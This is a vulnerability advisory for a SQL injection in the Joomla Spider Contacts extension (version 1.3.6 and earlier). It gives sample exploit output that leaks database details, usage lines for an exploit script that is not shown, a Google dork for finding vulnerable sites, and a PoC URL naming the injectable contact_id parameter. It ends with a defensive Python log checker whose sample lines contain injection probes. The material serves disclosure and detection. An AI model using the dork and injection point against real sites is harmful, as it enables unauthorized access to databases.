j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi
Written by:
Claudio Viviani
http://www.homelab.it
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Searching for Joomla Spider Contacts vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 1.3.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost
Exploit Usage
1) Joomla standard path: http://localhost/index.php?option=com_spidercontacts
[user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost
2) Joomla Custom path: http://localhost/joomla/index.php?option=com_spidercontacts
[user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost -b joomla
Info
######################
# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60
# Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE
# Dork Google: inurl:option=com_spidercontacts
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca
"contact_id" variable is not sanitized.
######################
# Vulnerability Disclosure Timeline:
2014-09-07: Discovered vulnerability
2014-09-09: Vendor Notification
2014-09-10: Vendor Response/Feedback
2014-09-10: Vendor Fix/Patch
2014-09-10: Public Disclosure
#####################
Discovered By : Claudio Viviani
#####################
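
The PoC above notes that "contact_id" is not sanitized. The following log check is an added example for defenders, not part of the original advisory or the author's exploit script: it flags com_spidercontacts requests whose contact_id is not a plain integer and counts them per source address. It assumes contact_id is normally a numeric ID and that the web server writes common/combined-format access logs; the log lines are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2014:10:00:01 +0000] "GET /index.php?option=com_spidercontacts&contact_id=3&view=showcontact&lang=ca HTTP/1.1" 200 5120
198.51.100.9 - - [10/Sep/2014:10:00:02 +0000] "GET /index.php?option=com_spidercontacts&contact_id=3%27&view=showcontact&lang=ca HTTP/1.1" 200 4711
198.51.100.9 - - [10/Sep/2014:10:00:03 +0000] "GET /joomla/index.php?option=com_spidercontacts&contact_id=3%20AND%201&view=showcontact HTTP/1.1" 200 5120
203.0.113.5 - - [10/Sep/2014:10:00:04 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900
"""

# client IP, then the request line: METHOD TARGET PROTOCOL
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def suspicious_requests(log_text):
    """Return (ip, decoded contact_id) for com_spidercontacts requests
    whose contact_id is not a plain integer (assumed normal form)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        # parse_qs URL-decodes values, so %27 and %20 are compared decoded
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if "com_spidercontacts" not in query.get("option", []):
            continue  # other components are out of scope for this check
        for value in query.get("contact_id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), value))
    return hits


def hits_per_source(log_text):
    """Count flagged requests per client address; a high count from one
    source is consistent with automated boolean-based probing."""
    return Counter(ip for ip, _ in suspicious_requests(log_text))


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} contact_id={value!r}")
    print(dict(hits_per_source(SAMPLE_LOG)))
```

Only the query string is inspected, so parameters sent in a POST body do not appear in these logs and need a WAF or application-level check instead.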